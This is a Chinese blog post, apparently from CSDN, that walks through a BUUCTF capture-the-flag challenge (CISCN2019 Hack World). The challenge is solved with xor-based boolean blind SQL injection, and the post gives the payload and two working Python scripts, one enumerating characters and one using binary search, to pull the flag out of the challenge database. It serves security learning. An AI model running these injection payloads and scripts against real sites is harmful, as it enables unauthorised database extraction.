二分法盲注

最新推荐文章于 2023-09-07 09:12:29 发布
最新推荐文章于 2023-09-07 09:12:29 发布
阅读量2.5k 收藏 12
点赞数 2
分类专栏: web安全 文章标签: 二分法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43756333/article/details/106332497
版权

在学sql盲注脚本的时候碰到了使用二分法盲注字段的情况,学习一下。

环境: [CISCN2019 华北赛区 Day2 Web1]Hack World

复现地址:BUUCTF

打开题目
在这里插入图片描述
直接告诉了flag在flag表和flag列里,让我们提交id。

这道题过滤了一些字段以及常用注入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤

最后使用的方法是异或注入,有关异或注入的原理,可参考异或注入

直接给出payload:1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

解题

开始编写盲注脚本,这里思路有很多,有枚举法,二分法,还看到过北邮大佬的延时注入,最简单的一种是枚举,直接贴出:

import requests

url = "http://c23802b8-f4bb-43f3-ae9e-aedcd32d9481.node3.buuoj.cn/index.php"
words = "Hello, glzjin wants a girlfriend."
flag=""
for i in range(1,100):
    print('----------------------------------------------------')
    for j in range(32,129):#ascii值范围
        data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}
        re = requests.post(url=url,data=data).text
        #如果回显为words内容,打印出j转换后的字符
        if words in re:
            flag+=chr(j)
            print(flag)
            break

大概跑个5分钟,即得flag.

在这里插入图片描述
第二种是这次需要学习的二分法。
在这里插入图片描述
关于二分法的知识:

  • 首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。

  • 如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。

  • 如果某一步数组为空,则表示找不到目标元素。

也很好理解,对于这题,首先取第一个字符的Ascii值同(32,130)的中间值相比较,如果正好相等,则输出字符,如果Ascii的值大于中间值,则取中间值到最大值这一范围的中间值继续同字符的Ascii值比较,重复上述操作直到两个值相等为止,最终输出整个字符串。按照这个思路编写脚本:

import requests

url = "http://c23802b8-f4bb-43f3-ae9e-aedcd32d9481.node3.buuoj.cn/index.php"
result = ""
for i in range(1,100):
	min_value = 33
	max_value = 130
	mid = (min_value+max_value)//2 #中值
	while(min_value<max_value):
		payload ={"id" : "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)}
		html = requests.post(url,data=payload)
		print(payload)
		if "Hello, glzjin wants a girlfriend." in html.text:
            	#ascii值比mid值大
			min_value = mid+1   
		else:
			max_value = mid
		mid = (min_value+max_value)//2
    	#找不到目标元素时停止
	if(chr(mid)==" "):
		break
	result += chr(mid)
	print(result)
print("fina flag:",result)

同样得到flag,并且速度比枚举法要快的多。

在这里插入图片描述

hui________
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
ctfshow web190 二分法盲注经典脚本 有单引号,利用回显不同
10-21
ctfshow web190 二分法盲注经典脚本 有单引号,利用回显不同
sql盲注二分法注入脚本
菜鸟-传奇
12-27 967
sql盲注二分法注入脚本 次脚本可以用来检测sql靶场第五关 http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1 #-*-coding:utf-8-*- import requests import time #host = "http://web.jarvisoj.com:32787/login.php" host = "http:...
二分法Fortran代码
01-03
用Fortran科学计算语言实现二分法求解方程的零点,代码风格简单明了,亲自调试通过
Fortran实现二分法.txt
10-16
利用Fortran实现二分法运算,例如计算方程f=x**3+4*x**2-10的零点。本程序设置较为人性化。
Python实现二分法搜索
12-20
Python实现二分法搜索 二分法是一种效率比较高的搜索方法,时间复杂度为 O(log2n) 。 假设有一个1~100之间的数字,你来猜这个数是多少,每猜一次可以得到三种回答:正确、大了或小了。如何保证用最少的次数猜对?很多人会想到先猜50,如果猜大了,说明答案比50小,然后猜25…用这种方法,每次都可以将数字的范围缩小一半,对于1~100之间的任何数,最多都只需要7次就能找到答案。 这种每次将搜索范围缩小一半的方法,就是二分法搜索的思想。本文使用 Python 来实现二分法搜索。 一、Python 二分法搜索递归实现 在实现代码前,先分析二分法的前提条件: 1. 上面的例子在1~100中查找
SQL注入盲注——二分法POST)
最新发布
qq_43520778的博客
09-07 284
[toc]SQL注入
二分法实现SQL盲注
小菜猴子_x
09-12 964
因为在buu上做题,然后无奈研究二分法实现SQL盲注
python多线程结合二分法算法|命令注入盲注
tempulcc的博客
09-28 631
实战python多线程结合二分法算法应用命令注入基于时间的盲注 本文采用threading、queue模块启用多线程,结合二分法算法思想(递归、非递归两种方法)实战natas的第16关、第17关,可大幅提升程序寻找通关密码的效率。 命令注入 URL:http://natas16.natas.labs.overthewire.org Username:natas16 Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 源码: <? $key = ""; if(arr
【CTF_流量日志分析】二分法盲注分析
serendipity1130的博客
10-16 1624
1.打开日志文件发现又是一道二分法盲注流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲注出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
sql-lap less8 二分法sql盲注脚本
qq_73722777的博客
04-14 226
【代码】sql-lap less8 二分法脚本。
matlab二分法算法
11-19
matlab二分法算法,实测可用,直接调用该函数即可得到目标解
python的sqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 4053
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分盲注实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
一天一道ctf 第47天(二分法盲注
scrawman的博客
07-29 283
[BSidesCF 2019]Kookie 看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???) [WUSTCTF2020]颜值成绩查询
【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1627
python实现sqli-labs第15关post盲注二分法注入脚本(基于布尔盲注
二分查找结合sql盲注
whojoe的博客
04-14 783
二分查找结合sql盲注回顾分析网上的代码找学算法的同学帮忙大佬真强算法优化后算法优化前验证效果数据表结构优化前耗时优化后耗时 回顾 昨天晚上写了一个sql盲注的脚本,对数据是采用的枚举方法,简单跑了一下发现非常的慢,于是上网去找了一下别人的代码。 分析 网上的代码 def get_Current_DbName(self): table_list = [] #二分法获...
SQL盲注加速方法总结
tpaer的博客
02-09 2711
SQL盲注加速方法二分法加速、.与运算加速、.二进制延时注入加速、dnslog OOB外带通信总结。
第二部分:2.盲注的讲解
→_→
03-17 990
何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 1 :基于布尔 L SQL 盲注 -------...
mysql盲注二分法脚本
zh_cn1的博客
08-12 419
PS 闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本 #正常页面的大小 def resLen(url): res=requests.get(url) return len(res.text) #当前数据库长度 def currdb_len(url): payload="1' and length(database())=" for i in range(1,100): if resLen(url+payload+str(i
SQL注入--盲注入(bool型)
liukenn的博客
07-30 7740
一个带GET参数的网站,但是网页中没有返回任何查询结果和报错信息,只返回对和错: 盲注入格式: http://127.0.0.1/index.php?id=1' and ascii(substr( (SQL语句),1,1 ))=ASCII%23 注: SQL语句 输入SQL注入语句; ASCII 返回的字符的ASCII码; 1 第一个字母,从1开始算起;
二分法
05-28
好的,以下是使用二分法进行查找的程序代码: ```python def binary_search(numbers, target): left = 0 right = len(numbers) - 1 while left <= right: mid = (left + right) // 2 if numbers[mid] == target: return mid elif numbers[mid] < target: left = mid + 1 else: right = mid - 1 return -1 # 主程序 lst = list(map(int, input("请输入一批从小到大的整数,以回车结束,用空格隔开:").split())) target = int(input("请输入要查找的数:")) result = binary_search(lst, target) if result == -1: print("该数不存在于列表中!") else: print("该数在列表中的索引位置为:", result) ``` 程序中,`binary_search` 函数接收两个参数,分别是 `numbers` 列表和 `target` 要查找的数。函数通过二分法进行查找,返回该数在列表中的索引位置,如果不存在则返回 -1。 主程序中,首先读入一批从小到大的整数,并将它们存入列表 `lst` 中;然后读入要查找的数 `target`,并调用 `binary_search` 函数进行查找;最后根据查找结果输出对应的提示信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hui________

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值